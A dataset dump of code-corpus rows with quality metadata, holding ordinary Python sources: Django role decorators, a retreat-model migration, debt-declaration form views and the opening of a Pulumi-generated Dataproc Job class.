hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | 
qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | 
qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
a6698bd14abe4e3f35667ab4d1e2105000e96f74 | 989 | py | Python | website/thesis/decorators.py | CodeJosh723/thesis-review-system | 9046eb9e803f48513f3f729f648d6b70f92cc425 | [
"MIT"
] | 1 | 2020-06-29T07:41:10.000Z | 2020-06-29T07:41:10.000Z | website/thesis/decorators.py | CodeJosh723/thesis-review-system | 9046eb9e803f48513f3f729f648d6b70f92cc425 | [
"MIT"
] | 4 | 2020-06-10T23:21:27.000Z | 2020-07-18T22:04:31.000Z | website/thesis/decorators.py | CodeJosh723/thesis-review-system | 9046eb9e803f48513f3f729f648d6b70f92cc425 | [
"MIT"
] | null | null | null | from django.shortcuts import redirect


def is_student(function):
    def wrap(request, *args, **kwargs):
        if not request.user.is_teacher:
            return function(request, *args, **kwargs)
        else:
            return redirect('thesis:group_list')
    wrap.__doc__ = function.__doc__
    wrap.__name__ = function.__name__
    return wrap


def is_teacher(function):
    def wrap(request, *args, **kwargs):
        if request.user.is_teacher:
            return function(request, *args, **kwargs)
        else:
            return redirect('thesis:document_list')
    wrap.__doc__ = function.__doc__
    wrap.__name__ = function.__name__
    return wrap


def has_group(function):
    def wrap(request, *args, **kwargs):
        if request.user.studentgroup:
            return function(request, *args, **kwargs)
        else:
            return redirect('thesis:group_create_join')
    wrap.__doc__ = function.__doc__
    wrap.__name__ = function.__name__
    return wrap
| 26.026316 | 55 | 0.645096 | 111 | 989 | 5.234234 | 0.261261 | 0.113597 | 0.175559 | 0.113597 | 0.836489 | 0.836489 | 0.836489 | 0.777969 | 0.777969 | 0.641997 | 0 | 0 | 0.253792 | 989 | 37 | 56 | 26.72973 | 0.787263 | 0 | 0 | 0.642857 | 0 | 0 | 0.061678 | 0.024267 | 0 | 0 | 0 | 0 | 0 | 1 | 0.214286 | false | 0 | 0.035714 | 0 | 0.571429 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 8 |
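The guard decorators in the row above manually copy `__doc__` and `__name__` onto the wrapper. A framework-free sketch of the same pattern, using `functools.wraps` to do those copies in one step; `User`, `Request`, and the `'redirect:…'` sentinel string are hypothetical stand-ins for Django's `request.user` and `redirect()`:

```python
from functools import wraps


class User:
    def __init__(self, is_teacher):
        self.is_teacher = is_teacher


class Request:
    def __init__(self, user):
        self.user = user


def is_student(function):
    @wraps(function)  # preserves __name__ / __doc__, like the manual copies above
    def wrap(request, *args, **kwargs):
        if not request.user.is_teacher:
            return function(request, *args, **kwargs)
        return 'redirect:thesis:group_list'  # stand-in for redirect()
    return wrap


@is_student
def document_list(request):
    """Student-only view."""
    return 'ok'


print(document_list(Request(User(is_teacher=False))))  # ok
print(document_list(Request(User(is_teacher=True))))   # redirect:thesis:group_list
print(document_list.__name__)                          # document_list
```

`wraps` also carries over `__module__`, `__qualname__`, and `__wrapped__`, which the manual two-attribute copy in the original does not.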
a6a928a5f929d384b2cd3d87200b62f93d0455d4 | 3,261 | py | Python | retirement/migrations/0027_auto_20200526_0848.py | MelanieFJNR/Blitz-API | 9a6daecd158fe07a6aeb80cbf586781eb688f0f9 | [
"MIT"
] | 3 | 2019-10-22T00:16:49.000Z | 2021-07-15T07:44:43.000Z | retirement/migrations/0027_auto_20200526_0848.py | MelanieFJNR/Blitz-API | 9a6daecd158fe07a6aeb80cbf586781eb688f0f9 | [
"MIT"
] | 1,183 | 2018-04-19T18:40:30.000Z | 2022-03-31T21:05:05.000Z | retirement/migrations/0027_auto_20200526_0848.py | MelanieFJNR/Blitz-API | 9a6daecd158fe07a6aeb80cbf586781eb688f0f9 | [
"MIT"
] | 12 | 2018-04-17T19:16:42.000Z | 2022-01-27T00:19:59.000Z | # Generated by Django 2.2.12 on 2020-05-26 12:48

from django.db import migrations, models


class Migration(migrations.Migration):

    dependencies = [
        ('retirement', '0026_auto_20200403_0827'),
    ]

    operations = [
        migrations.AddField(
            model_name='historicalretreat',
            name='type',
            field=models.CharField(choices=[('V', 'Virtual'), ('P', 'Physical')], default='P', max_length=100, verbose_name='Type of retreat'),
        ),
        migrations.AddField(
            model_name='historicalretreat',
            name='videoconference_link',
            field=models.TextField(blank=True, null=True, verbose_name='Videoconference link'),
        ),
        migrations.AddField(
            model_name='historicalretreat',
            name='videoconference_tool',
            field=models.CharField(blank=True, max_length=100, null=True, verbose_name='Videoconference tool'),
        ),
        migrations.AddField(
            model_name='retreat',
            name='type',
            field=models.CharField(choices=[('V', 'Virtual'), ('P', 'Physical')], default='P', max_length=100, verbose_name='Type of retreat'),
        ),
        migrations.AddField(
            model_name='retreat',
            name='videoconference_link',
            field=models.TextField(blank=True, null=True, verbose_name='Videoconference link'),
        ),
        migrations.AddField(
            model_name='retreat',
            name='videoconference_tool',
            field=models.CharField(blank=True, max_length=100, null=True, verbose_name='Videoconference tool'),
        ),
        migrations.AlterField(
            model_name='historicalretreat',
            name='accessibility',
            field=models.BooleanField(blank=True, null=True, verbose_name='Accessibility'),
        ),
        migrations.AlterField(
            model_name='historicalretreat',
            name='has_shared_rooms',
            field=models.BooleanField(blank=True, null=True),
        ),
        migrations.AlterField(
            model_name='historicalretreat',
            name='place_name',
            field=models.CharField(blank=True, max_length=200, null=True, verbose_name='Place name'),
        ),
        migrations.AlterField(
            model_name='historicalretreat',
            name='postal_code',
            field=models.CharField(blank=True, max_length=10, null=True, verbose_name='Postal code'),
        ),
        migrations.AlterField(
            model_name='retreat',
            name='accessibility',
            field=models.BooleanField(blank=True, null=True, verbose_name='Accessibility'),
        ),
        migrations.AlterField(
            model_name='retreat',
            name='has_shared_rooms',
            field=models.BooleanField(blank=True, null=True),
        ),
        migrations.AlterField(
            model_name='retreat',
            name='place_name',
            field=models.CharField(blank=True, max_length=200, null=True, verbose_name='Place name'),
        ),
        migrations.AlterField(
            model_name='retreat',
            name='postal_code',
            field=models.CharField(blank=True, max_length=10, null=True, verbose_name='Postal code'),
        ),
    ]
| 38.821429 | 143 | 0.597669 | 315 | 3,261 | 6.031746 | 0.193651 | 0.066316 | 0.078947 | 0.1 | 0.918947 | 0.918947 | 0.807368 | 0.782105 | 0.782105 | 0.782105 | 0 | 0.02291 | 0.277216 | 3,261 | 83 | 144 | 39.289157 | 0.783199 | 0.014106 | 0 | 0.909091 | 1 | 0 | 0.187675 | 0.007158 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.012987 | 0 | 0.051948 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
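The migration row above adds a `type` CharField whose `choices` pair a stored one-character code with a display label. A framework-free sketch of how such choice pairs resolve a stored code to its label (roughly what Django's generated `get_type_display()` does); `display_label` and its fallback behavior are illustrative, not Django API:

```python
# Choice pairs copied from the migration: (stored code, human-readable label).
TYPE_CHOICES = [('V', 'Virtual'), ('P', 'Physical')]


def display_label(code, choices, default='P'):
    """Return the label for a stored code, falling back to the default code's label."""
    labels = dict(choices)
    return labels.get(code, labels[default])


print(display_label('V', TYPE_CHOICES))  # Virtual
print(display_label('P', TYPE_CHOICES))  # Physical
print(display_label('X', TYPE_CHOICES))  # Physical (falls back to default='P')
```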
a6b065c21e043ee0ad6c7a9d0c085a241153c7b8 | 16,700 | py | Python | declaraciones/declaracion/views/pasivos.py | gob-cdmx/declaraciones | 90347c1572fa5b8137c5e0d23e6a7c6b2a0b2311 | [
"MIT"
] | 2 | 2019-10-17T02:40:12.000Z | 2019-10-17T22:51:36.000Z | declaraciones/declaracion/views/pasivos.py | gob-cdmx/declaraciones | 90347c1572fa5b8137c5e0d23e6a7c6b2a0b2311 | [
"MIT"
] | 1 | 2019-10-02T20:23:12.000Z | 2019-10-02T20:23:12.000Z | declaraciones/declaracion/views/pasivos.py | gob-cdmx/declaraciones | 90347c1572fa5b8137c5e0d23e6a7c6b2a0b2311 | [
"MIT"
] | 4 | 2019-08-20T21:16:04.000Z | 2021-07-01T03:08:10.000Z | import uuid

from django.urls import reverse_lazy, resolve
from django.views import View
from django.shortcuts import render, redirect
from django.forms.models import model_to_dict
from django.http import HttpResponseRedirect, Http404
from django.utils.decorators import method_decorator
from django.contrib.auth.decorators import login_required
from declaracion.models import (Declaraciones, SeccionDeclaracion, DeudasOtros,
                                Secciones, SeccionDeclaracion)
from declaracion.forms import (ObservacionesForm, DomiciliosForm, DeudasForm,
                               DeudasOtrosForm, InfoPersonalVarForm)
from .utils import (guardar_estatus, no_aplica, declaracion_datos,
                    validar_declaracion, obtiene_avance)
from .declaracion import DeclaracionDeleteView


class DeudasDeleteView(DeclaracionDeleteView):
    model = DeudasOtros


class DeudasView(View):
    template_name = 'declaracion/pasivos/deudas.html'

    @method_decorator(login_required(login_url='/login'))
    def get(self, request, *args, **kwargs):
        folio_declaracion = self.kwargs['folio']
        avance, faltas = 0, None
        try:
            declaracion = validar_declaracion(request, folio_declaracion)
            avance, faltas = obtiene_avance(declaracion)
        except:
            raise Http404()
        kwargs['cat_tipos_pasivos'] = 1
        agregar, editar_id, deudas_data, informacion_registrada = (
            declaracion_datos(kwargs, DeudasOtros, declaracion)
        )
        if deudas_data:
            observaciones_data = deudas_data.observaciones
            acreedor_infopersonalvar = deudas_data.acreedor_infopersonalvar
            if acreedor_infopersonalvar.domicilios:
                domicilio_data = acreedor_infopersonalvar.domicilios
                domicilio_data = model_to_dict(domicilio_data)
            else:
                domicilio_data = {}
            acreedor_infopersonalvar = model_to_dict(acreedor_infopersonalvar)
            observaciones_data = model_to_dict(observaciones_data)
            deudas_data = model_to_dict(deudas_data)
        else:
            observaciones_data = {}
            domicilio_data = {}
            deudas_data = {}
            acreedor_infopersonalvar = {}
        deudas_form = DeudasForm(prefix="deudas",
                                 initial=deudas_data)
        observaciones_form = ObservacionesForm(prefix="observaciones",
                                               initial=observaciones_data)
        domicilio_form = DomiciliosForm(prefix="domicilio",
                                        initial=domicilio_data)
        acreedor_infopersonalvar_form = InfoPersonalVarForm(
            prefix="acreedor_infopersonalvar",
            initial=acreedor_infopersonalvar)
        return render(request, self.template_name, {
            'deudas_form': deudas_form,
            'observaciones_form': observaciones_form,
            'domicilio_form': domicilio_form,
            'acreedor_infopersonalvar_form': acreedor_infopersonalvar_form,
            'folio_declaracion': folio_declaracion,
            'avance': avance,
            'faltas': faltas,
            'informacion_registrada': informacion_registrada,
            'agregar': agregar,
            'editar_id': editar_id
        })

    @method_decorator(login_required(login_url='/login'))
    def post(self, request, *args, **kwargs):
        folio_declaracion = self.kwargs['folio']
        try:
            declaracion = validar_declaracion(request, folio_declaracion)
        except:
            raise Http404()
        kwargs['cat_tipos_pasivos'] = 1
        agregar, editar_id, deudas_data, informacion_registrada = (
            declaracion_datos(kwargs, DeudasOtros, declaracion)
        )
        if deudas_data:
            observaciones_data = deudas_data.observaciones
            acreedor_infopersonalvar = deudas_data.acreedor_infopersonalvar
            if acreedor_infopersonalvar.domicilios:
                domicilio_data = acreedor_infopersonalvar.domicilios
            else:
                domicilio_data = None
        else:
            observaciones_data = None
            domicilio_data = None
            deudas_data = None
            acreedor_infopersonalvar = None
        deudas_form = DeudasForm(request.POST, prefix="deudas",
                                 instance=deudas_data)
        observaciones_form = ObservacionesForm(request.POST,
                                               prefix="observaciones",
                                               instance=observaciones_data)
        domicilio_form = DomiciliosForm(request.POST,
                                        prefix="domicilio",
                                        instance=domicilio_data)
        acreedor_infopersonalvar_form = InfoPersonalVarForm(
            request.POST,
            prefix="acreedor_infopersonalvar",
            instance=acreedor_infopersonalvar)
        deudas_is_valid = deudas_form.is_valid()
        observaciones_is_valid = observaciones_form.is_valid()
        domicilio_is_valid = domicilio_form.is_valid()
        acreedor_infopersonalvar_is_valid = acreedor_infopersonalvar_form.is_valid()
        if (deudas_is_valid and
                observaciones_is_valid and
                domicilio_is_valid and
                acreedor_infopersonalvar_is_valid):
            deudas = deudas_form.save(commit=False)
            observaciones = observaciones_form.save()
            domicilio = domicilio_form.save()
            acreedor_infopersonalvar = acreedor_infopersonalvar_form.save(commit=False)
            acreedor_infopersonalvar.declaraciones = declaracion
            acreedor_infopersonalvar.domicilios = domicilio
            acreedor_infopersonalvar.save()
            deudas.acreedor_infopersonalvar = acreedor_infopersonalvar
            deudas.declaraciones = declaracion
            deudas.cat_tipos_pasivos_id = 1
            deudas.observaciones = observaciones
            deudas.save()
            if not agregar and not editar_id:
                status_obj, status_created = guardar_estatus(
                    request,
                    declaracion.folio,
                    SeccionDeclaracion.COMPLETA,
                    aplica=no_aplica(request))
            if request.POST.get("accion") == "guardar_otro":
                return redirect('declaracion:deudas-agregar', folio=folio_declaracion)
            if request.POST.get("accion") == "guardar_salir":
                return redirect('declaracion:perfil')
            return redirect('declaracion:deudas-otros',
                            folio=folio_declaracion)
        return render(request, self.template_name, {
            'deudas_form': deudas_form,
            'observaciones_form': observaciones_form,
            'domicilio_form': domicilio_form,
            'folio_declaracion': folio_declaracion,
            'acreedor_infopersonalvar_form': acreedor_infopersonalvar_form,
            'avance': declaracion.avance,
            'informacion_registrada': informacion_registrada,
            'agregar': agregar,
            'editar_id': editar_id
        })


class DeudasOtrosDeleteView(DeclaracionDeleteView):
    model = DeudasOtros


class DeudasOtrosView(View):
    template_name = 'declaracion/pasivos/deudas-otros.html'

    @method_decorator(login_required(login_url='/login'))
    def get(self, request, *args, **kwargs):
        folio_declaracion = self.kwargs['folio']
        avance, faltas = 0, None
        try:
            declaracion = validar_declaracion(request, folio_declaracion)
            avance, faltas = obtiene_avance(declaracion)
        except:
            raise Http404()
        kwargs['cat_tipos_pasivos'] = 2
        agregar, editar_id, deudas_otros_data, informacion_registrada = (
            declaracion_datos(kwargs, DeudasOtros, declaracion)
        )
        if deudas_otros_data:
            observaciones_data = deudas_otros_data.observaciones
            acreedor_infopersonalvar = deudas_otros_data.acreedor_infopersonalvar
            if acreedor_infopersonalvar.domicilios:
                domicilio_data = acreedor_infopersonalvar.domicilios
                domicilio_data = model_to_dict(domicilio_data)
            else:
                domicilio_data = {}
            acreedor_infopersonalvar = model_to_dict(acreedor_infopersonalvar)
            observaciones_data = model_to_dict(observaciones_data)
            deudas_otros_data = model_to_dict(deudas_otros_data)
        else:
            observaciones_data = {}
            domicilio_data = {}
            deudas_otros_data = {}
            acreedor_infopersonalvar = {}
        deudas_otros_form = DeudasOtrosForm(
            prefix="deudas_otros",
            initial=deudas_otros_data)
        observaciones_form = ObservacionesForm(
            prefix="observaciones",
            initial=observaciones_data)
        domicilio_form = DomiciliosForm(
            prefix="domicilio",
            initial=domicilio_data)
        acreedor_infopersonalvar_form = InfoPersonalVarForm(
            prefix="acreedor_infopersonalvar",
            initial=acreedor_infopersonalvar)
        return render(request, self.template_name, {
            'deudas_otros_form': deudas_otros_form,
            'observaciones_form': observaciones_form,
            'domicilio_form': domicilio_form,
            'acreedor_infopersonalvar_form': acreedor_infopersonalvar_form,
            'folio_declaracion': folio_declaracion,
            'avance': avance,
            'faltas': faltas,
            'informacion_registrada': informacion_registrada,
            'agregar': agregar,
            'editar_id': editar_id
        })

    @method_decorator(login_required(login_url='/login'))
    def post(self, request, *args, **kwargs):
        folio_declaracion = self.kwargs['folio']
        try:
            declaracion = validar_declaracion(request, folio_declaracion)
        except:
            raise Http404()
        kwargs['cat_tipos_pasivos'] = 2
        agregar, editar_id, deudas_otros_data, informacion_registrada = (
            declaracion_datos(kwargs, DeudasOtros, declaracion)
        )
        if deudas_otros_data:
            observaciones_data = deudas_otros_data.observaciones
            acreedor_infopersonalvar = deudas_otros_data.acreedor_infopersonalvar
            if acreedor_infopersonalvar.domicilios:
                domicilio_data = acreedor_infopersonalvar.domicilios
            else:
                domicilio_data = None
        else:
            observaciones_data = None
            domicilio_data = None
            deudas_otros_data = None
            acreedor_infopersonalvar = None
        deudas_otros_form = DeudasOtrosForm(
            request.POST,
            prefix="deudas_otros",
            instance=deudas_otros_data)
        observaciones_form = ObservacionesForm(
            request.POST,
            prefix="observaciones",
            instance=observaciones_data)
        domicilio_form = DomiciliosForm(
            request.POST,
            prefix="domicilio",
            instance=domicilio_data)
        acreedor_infopersonalvar_form = InfoPersonalVarForm(
            request.POST,
            prefix="acreedor_infopersonalvar",
            instance=acreedor_infopersonalvar)
        deudas_otros_is_valid = deudas_otros_form.is_valid()
        observaciones_is_valid = observaciones_form.is_valid()
        domicilio_is_valid = domicilio_form.is_valid()
        acreedor_infopersonalvar_is_valid = acreedor_infopersonalvar_form.is_valid()
        if (deudas_otros_is_valid and
                observaciones_is_valid and
                domicilio_is_valid and
                acreedor_infopersonalvar_is_valid):
            deudas = deudas_otros_form.save(commit=False)
            observaciones = observaciones_form.save()
            domicilio = domicilio_form.save()
            acreedor_infopersonalvar = acreedor_infopersonalvar_form.save(commit=False)
            acreedor_infopersonalvar.declaraciones = declaracion
            acreedor_infopersonalvar.domicilios = domicilio
            acreedor_infopersonalvar.save()
            deudas.acreedor_infopersonalvar = acreedor_infopersonalvar
            deudas.declaraciones = declaracion
            deudas.cat_tipos_pasivos_id = 2
            deudas.observaciones = observaciones
            deudas.save()
            if not agregar and not editar_id:
                status_obj, status_created = guardar_estatus(
                    request,
                    declaracion.folio,
                    SeccionDeclaracion.COMPLETA,
                    aplica=no_aplica(request))
            if request.POST.get("accion") == "guardar_otro":
                return redirect('declaracion:deudas-otros-agregar', folio=folio_declaracion)
            if request.POST.get("accion") == "guardar_salir":
                return redirect('declaracion:perfil')
            return redirect('declaracion:pasivos-observaciones',
                            folio=folio_declaracion)
        return render(request, self.template_name, {
            'deudas_otros_form': deudas_otros_form,
            'observaciones_form': observaciones_form,
            'domicilio_form': domicilio_form,
            'acreedor_infopersonalvar_form': acreedor_infopersonalvar_form,
            'folio_declaracion': folio_declaracion,
            'avance': declaracion.avance,
            'informacion_registrada': informacion_registrada,
            'agregar': agregar,
            'editar_id': editar_id
        })


class PasivosObservacionesView(View):
    template_name = 'declaracion/pasivos/observaciones.html'

    @method_decorator(login_required(login_url='/login'))
    def get(self, request, *args, **kwargs):
        folio_declaracion = self.kwargs['folio']
        avance, faltas = 0, None  # obtiene_avance(declaracion)
        try:
            declaracion = validar_declaracion(request, folio_declaracion)
            avance, faltas = obtiene_avance(declaracion)
        except:
            raise Http404()
        current_url = resolve(request.path_info).url_name
        seccion_id = Secciones.objects.filter(url=current_url).first()
        seccion = SeccionDeclaracion.objects.filter(declaraciones=declaracion, seccion=seccion_id).first()
        if seccion:
            observaciones_data = seccion.observaciones
            observaciones_data = model_to_dict(observaciones_data)
        else:
            observaciones_data = {}
        observaciones_form = ObservacionesForm(
            prefix="observaciones",
            initial=observaciones_data)
        return render(request, self.template_name, {
            'observaciones_form': observaciones_form,
            'folio_declaracion': folio_declaracion,
            'avance': avance,
            'faltas': faltas
        })

    @method_decorator(login_required(login_url='/login'))
    def post(self, request, *args, **kwargs):
        folio_declaracion = self.kwargs['folio']
        try:
            declaracion = validar_declaracion(request, folio_declaracion)
        except:
            raise Http404()
        current_url = resolve(request.path_info).url_name
        seccion_id = Secciones.objects.filter(url=current_url).first()
        seccion = SeccionDeclaracion.objects.filter(declaraciones=declaracion, seccion=seccion_id).first()
        if seccion:
            observaciones_data = seccion.observaciones
        else:
            observaciones_data = None
        observaciones_form = ObservacionesForm(
            request.POST,
            prefix="observaciones",
            instance=observaciones_data)
        observaciones_is_valid = observaciones_form.is_valid()
        if observaciones_is_valid:
            status_obj, status_created = guardar_estatus(request,
                                                         declaracion.folio,
                                                         SeccionDeclaracion.COMPLETA,
                                                         aplica=no_aplica(request))
            observaciones = observaciones_form.save()
            status_obj.observaciones = observaciones
            status_obj.save()
            if request.POST.get("accion") == "guardar_salir":
                return redirect('declaracion:perfil')
            return redirect('declaracion:confirmacion-informacion-personal',
                            folio=folio_declaracion)
        return render(request, self.template_name, {
            'observaciones_form': observaciones_form,
            'folio_declaracion': folio_declaracion,
            'avance': declaracion.avance
        })
| 40.240964 | 106 | 0.630838 | 1,439 | 16,700 | 7.009729 | 0.084086 | 0.14593 | 0.042827 | 0.03569 | 0.869832 | 0.852682 | 0.829087 | 0.81154 | 0.809854 | 0.797958 | 0 | 0.002561 | 0.298623 | 16,700 | 414 | 107 | 40.338164 | 0.858619 | 0.001617 | 0 | 0.822857 | 0 | 0 | 0.086192 | 0.033949 | 0 | 0 | 0 | 0 | 0 | 1 | 0.017143 | false | 0 | 0.034286 | 0 | 0.12 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
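The views in the row above define `get()` and `post()` on `View` subclasses and rely on the base class to route each request by HTTP method. A minimal framework-free sketch of that dispatch pattern (illustrative only, not Django's actual implementation; `Request`, the status-tuple returns, and `DeudasSketchView` are made up for the example):

```python
class View:
    """Route a request to the handler named after its HTTP method."""

    def dispatch(self, request, *args, **kwargs):
        handler = getattr(self, request.method.lower(), None)
        if handler is None:
            return ('405', 'method not allowed')
        return handler(request, *args, **kwargs)


class Request:
    def __init__(self, method):
        self.method = method


class DeudasSketchView(View):
    def get(self, request):
        return ('200', 'render form')

    def post(self, request):
        return ('302', 'redirect after save')


v = DeudasSketchView()
print(v.dispatch(Request('GET')))   # ('200', 'render form')
print(v.dispatch(Request('POST')))  # ('302', 'redirect after save')
```

This is why each class above only needs `get`/`post` bodies plus `@method_decorator(login_required(...))` per handler; URL wiring hands the request to `dispatch`.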
a6c9cbf709b3cd4ea1b1218c7220752309f6ec2e | 42,581 | py | Python | sdk/python/pulumi_gcp/dataproc/job.py | sisisin/pulumi-gcp | af6681d70ea457843409110c1324817fe55f68ad | [
"ECL-2.0",
"Apache-2.0"
] | 121 | 2018-06-18T19:16:42.000Z | 2022-03-31T06:06:48.000Z | sdk/python/pulumi_gcp/dataproc/job.py | sisisin/pulumi-gcp | af6681d70ea457843409110c1324817fe55f68ad | [
"ECL-2.0",
"Apache-2.0"
] | 492 | 2018-06-22T19:41:03.000Z | 2022-03-31T15:33:53.000Z | sdk/python/pulumi_gcp/dataproc/job.py | sisisin/pulumi-gcp | af6681d70ea457843409110c1324817fe55f68ad | [
"ECL-2.0",
"Apache-2.0"
] | 43 | 2018-06-19T01:43:13.000Z | 2022-03-23T22:43:37.000Z | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['JobArgs', 'Job']
@pulumi.input_type
class JobArgs:
def __init__(__self__, *,
placement: pulumi.Input['JobPlacementArgs'],
force_delete: Optional[pulumi.Input[bool]] = None,
hadoop_config: Optional[pulumi.Input['JobHadoopConfigArgs']] = None,
hive_config: Optional[pulumi.Input['JobHiveConfigArgs']] = None,
labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
pig_config: Optional[pulumi.Input['JobPigConfigArgs']] = None,
project: Optional[pulumi.Input[str]] = None,
pyspark_config: Optional[pulumi.Input['JobPysparkConfigArgs']] = None,
reference: Optional[pulumi.Input['JobReferenceArgs']] = None,
region: Optional[pulumi.Input[str]] = None,
scheduling: Optional[pulumi.Input['JobSchedulingArgs']] = None,
spark_config: Optional[pulumi.Input['JobSparkConfigArgs']] = None,
sparksql_config: Optional[pulumi.Input['JobSparksqlConfigArgs']] = None):
"""
The set of arguments for constructing a Job resource.
:param pulumi.Input['JobPlacementArgs'] placement: The config of job placement.
:param pulumi.Input[bool] force_delete: By default, you can only delete inactive jobs within
Dataproc. Setting this to true, and calling destroy, will ensure that the
job is first cancelled before issuing the delete.
:param pulumi.Input['JobHadoopConfigArgs'] hadoop_config: The config of Hadoop job
:param pulumi.Input['JobHiveConfigArgs'] hive_config: The config of hive job
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] labels: The list of labels (key/value pairs) to add to the job.
:param pulumi.Input['JobPigConfigArgs'] pig_config: The config of pag job.
:param pulumi.Input[str] project: The project in which the `cluster` can be found and jobs
subsequently run against. If it is not provided, the provider project is used.
:param pulumi.Input['JobPysparkConfigArgs'] pyspark_config: The config of pySpark job.
:param pulumi.Input['JobReferenceArgs'] reference: The reference of the job
:param pulumi.Input[str] region: The Cloud Dataproc region. This essentially determines which clusters are available
